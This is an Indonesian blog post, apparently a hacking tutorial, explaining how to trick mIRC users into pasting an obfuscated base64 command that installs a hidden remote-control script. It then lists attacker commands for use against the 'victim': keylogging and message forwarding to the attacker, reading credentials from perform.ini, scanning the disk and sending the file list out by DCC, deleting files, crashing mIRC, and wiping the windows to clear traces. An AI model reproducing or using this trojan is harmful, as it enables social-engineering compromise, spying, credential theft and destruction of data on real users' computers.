Pada kesempatan kali ini, kita akan sedikit bahas yang namanya Trully Remote Access pada mIRC.
Bagaimana cara kerjanya?? Bener bener Remote kah??
Sering gak sih kalian dapat spam bot untuk mengetikan sebuah code tertentu?? Dan biasanya dijanjikan akan dapat men-take over channel orang lain di mIRC? Kalau sering, yah tentunya sudah tahu apa yang harus dilakukan dengan code tersebut .. Hehehe ..
Bagi yang belum pernah tahu. Ada sebuah cara dimana anda akan dapat melakukan “Remote Access” pada komputer orang lain melalui mIRC, dan hanya perlu dilakukan dengan cara membuat si victim percaya untuk mengetikan sebuah code. Code apakah itu??
CODE
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IG hhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg
Sebenarnya apa sih arti daripada code tersebut??!
Saya juga doeloe waktu pertama kali mainan mIRC gak tau menahu, sebenernya apa sih hal kayak bgituan?? Kenapa sih koq dengan ngetik itu komputer kita isa ke take over sama orang?? Memang itu code artinya apa??
Setelah bertapa lama (Cie ileh makek bertapa), akhirnya saya mengerti bahwa itu adalah Base64 Encoding dan sebenernya arti daripada code diatas itu adalah:CODE
on ^*:text:ins*:?:{ . $+ $2- | haltdef }
Dimana brarti juga bahwa setiap message dari anda kepada victim anda yang dimulai dengan kata “ins” akan di block, sehingga si victim tidak akan tahu command yang anda ketikan kepada dia.
Contoh:
/msg
Dengan menggunakan command diatas anda melakukan perintah kepada victim anda untuk mengetikan kata “hi” di channel yang bernama #sate
Lalu apa yg bisa kita lakukan dengan itu?? Apa hanya demikian??
Weits .. Tidak .. !!! Masih banyak cara lain yang bisa anda lakukan, contohnya adalah melakukan spying pada victim, melihat semua yang dia ketik dan lain sebagainya. Tak percaya?? Ketikanlah code berikut setelah victim ter-injeksi:CODE
chanel
/msg victim ins write -c myscript.mrc
/msg victim ins unload -rs myscript.mrc
/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg victim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }
/msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg victim ins load -rs myscript.mrc
Note: Dimana victim adalah nickname korban anda dan YOURNICK adalah nick anda sendiri dalam IRC Server yang sama
Anda juga dapat berhenti melakukan spying dengan cara mengetikan code ini:
/msg victim ins unload -rs myscript.mrc
Terkadang anda juga ingin melakukan pengintaian hanya setengah2. Maksud saya, misalnya anda ingin melihat apa sih yang dia ketikan di private messages, tapi anda tidak ingin mendapatkan apa yang dia bicarakan di channel, itu bisa diakalin dengan code berikut ini:CODE
Pv an
/msg victim ins write -c myscript.mrc
/msg victim ins unload -rs myscript.mrc
/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg victim ins write myscript.mrc on *:TEXT:*:?:Question { .msg YOURNICK $timestamp <- < $+ $nick $+ > $1- }
/msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg victim ins load -rs myscript.mrc
Bahkan anda juga bisa menjadikannya semacam BOT anda di mIRC dengan sedikit trick seperti ini:CODE
/msg victim insert write -c testing.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
/msg victim ins .load –rs testing.mrc
Dimana dia akan melakukan pemberian Operator access pada anda (+o) di channel dimana dia OP dan anda mengetikan “!opme” (Tanpa kutip).
Berikut adalah list command yang bisa anda lakukan:
REMOVE FILE :
/msg victim ins remove C:\Textfile.txt
OPEN SITE:
/msg victim ins url www.site.com
JOIN CHANNEL:
/msg victim ins join #channel
PART CHANNEL:
/msg victim ins part #channel
QUERY USER:
/msg victim ins query user
MSG USER:
/msg victim ins msg user
INVITE USER:
/msg victim ins invite user #channel
BAN USER:
/msg victim ins ban #channel user
KICK USER:
/msg victim ins kick #channel user
IGNORE USER:
/msg victim ins ignore *!*@host.com
UNIGNORE USER:
/msg victim ins unignore *!*@host.com
CHANGE NICK:
/msg victim ins nick thenickyouwant
OP USER:
/msg victim ins mode #channel +o user
VOICE USER:
/msg victim ins mode #channel +v user
CHANGE TOPIC:
/msg victim ins topic #channel text
RECEIVE FILE:
/msg victim ins dcc send user file
or
/msg victim ins dcc send user C:\something.sth
EDIT TEXT:
/msg victim ins write -l1 C:\TESTING.txt thetextyouwanttoedit
(-l1 –> first line)
READ A PIECE OF FILE (LIKE PERFORM):
following commands must be executed after eachother:
/msg victim ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
/msg victim ins .load -rs mab
/msg victim ins abcd123
SEARCH HARD DISK FOR A FILE:
/msg victim ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }
/msg victim ins .load -rs MAB1
/msg victim ins MAB1
LET HIS mIRC CRASH:
/msg victim ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
/msg victim ins .load -rs MAB2
/msg victim ins MAB2
SCAN HIS HARD DISK AND SAVE IT AS .txt:
//echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)
/msg victim ins dcc send YOURNICK C:\M_A_B.txt
/msg victim write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IG hhbHRkZWYgfQ==,m) | .load -rs MyNewScript.mrc
TURN THE AUTO JOIN ON INVITE ON (or OFF)
/msg victim ins ajinvite on
LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
/msg victim ins amsg
CHANGE THE VICTIMs ALTERNATIVE NICK:
/msg victim ins anick
CHANGE THE VICTIMs BACKGROUND PICTURE:
/msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]
with
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile, photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture
LET THE “mIRC CHANNEL CENTRAL” OF A CHANNEL POP UP:
/msg victim ins channel #CHANNELNAME
Note: sang korban harus ada pada #CHANNELNAME
CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:
/msg victim ins clearall [-snqmtgu]
s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.
LET THE VICTIM CLIPBOARD A SPECIFIED TEXT:
/msg victim ins clipboard
CLOSE THE OPEN QUERIES OF THE VICTIM:
/msg victim ins close
LET THE VICTIM QUIT mIRC:
/msg victim ins quit
LET THE VICTIM DISCONNECT FROM SERVER:
/msg victim ins disconnect
LET THE VICTIM CHANGE SERVER:
/msg victim ins server the.server.you.want
LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
/msg victim ins server -m
/msg victim ins server the.server.you.want
LET THE VICTIM GIVE YOU FLAGS (if he is able to):
/msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag
Note:
|TheBot| = the bot who can give flags
Chanlev = can be different, sometimes it is also, “adduser”
flag = the flag you want
YOURNICK = your nick
CHANGE THE VICTIMs FONT AND FONT SIZE:
/msg victim ins font -asgbd
CHANGE THE VICTIMs FULL NAME:
/msg victim ins fullname
LET THE VICTIM REJOIN A CHANNEL:
/msg victim ins hop #CHANNEL
MAKE A NEW DIRECTORY ON THE VICITMs HARD DISK:
/msg victim ins mkdir
NOTE:
victim = nick of the victim
user = your nick
Sekian~
Note: Ini juga merupakan sebuah pembuktian bahwa, dengan hanya menggunakan mIRC kita bisa membuat sebuah trojan yang langsung melakukan penyerangan ke komputer lawan. Terbukti dengan access yang kita dapat untuk men-delete dan memanipulasi berbagai hal di komputer sang korban.
thanks yo kalo udah baca
See yaa !!
ceers n beers
best regards
ironepunx
special to : mr.nyem,|slackware|,CupiD^,kicik_karak_kuruk,OjeR,andhie_mtr,sinchi,pendjahat
terima kasih atas bimbingannnya
---------------------------------evolution---------------------------------
0 komentar:
Posting Komentar